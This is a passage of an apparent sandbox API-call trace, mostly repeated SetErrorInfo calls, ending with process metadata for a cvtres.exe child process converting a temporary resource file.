[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.025] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.026] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.027] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.028] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.029] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.030] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.031] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.031] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.031] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.031] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.031] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.032] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.034] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.035] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.036] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.037] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.038] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.057] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.063] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.066] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.068] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.073] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.074] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.077] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.077] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x12d1b8 | out: ppstm=0x12d1b8*=0x346ca0) returned 0x0
[0062.080] IUnknown:AddRef (This=0x346ca0) returned 0x2
[0062.080] IStream:LockRegion (This=0x346ca0, libOffset=0x0, cb=0x0, dwLockType=0x12cfd0) returned 0x0
[0062.081] IStream:Commit (This=0x346ca0, grfCommitFlags=0x2e6eba0) returned 0x0
[0062.082] IUnknown:Release (This=0x346ca0) returned 0x1
[0062.082] CMemStm::Stat () returned 0x0
[0062.082] IStream:LockRegion (This=0x346ca0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0
[0062.082] IStream:SetSize (This=0x346ca0, libNewSize=0x2e5e93c) returned 0x0
[0062.082] IUnknown:Release (This=0x346ca0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.082] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.092] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0062.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
Thread:
id = 31
os_tid = 0x0
Process:
id = "3"
image_name = "cvtres.exe"
filename = "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cvtres.exe"
page_root = "0x3c517000"
os_pid = "0xbb8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "2"
os_parent_pid = "0xba0"
cmd_line = "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\RESEDB9.tmp\" \"c:\\Users\\aETAdzjz\\Desktop\\CSCED98.tmp\""
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
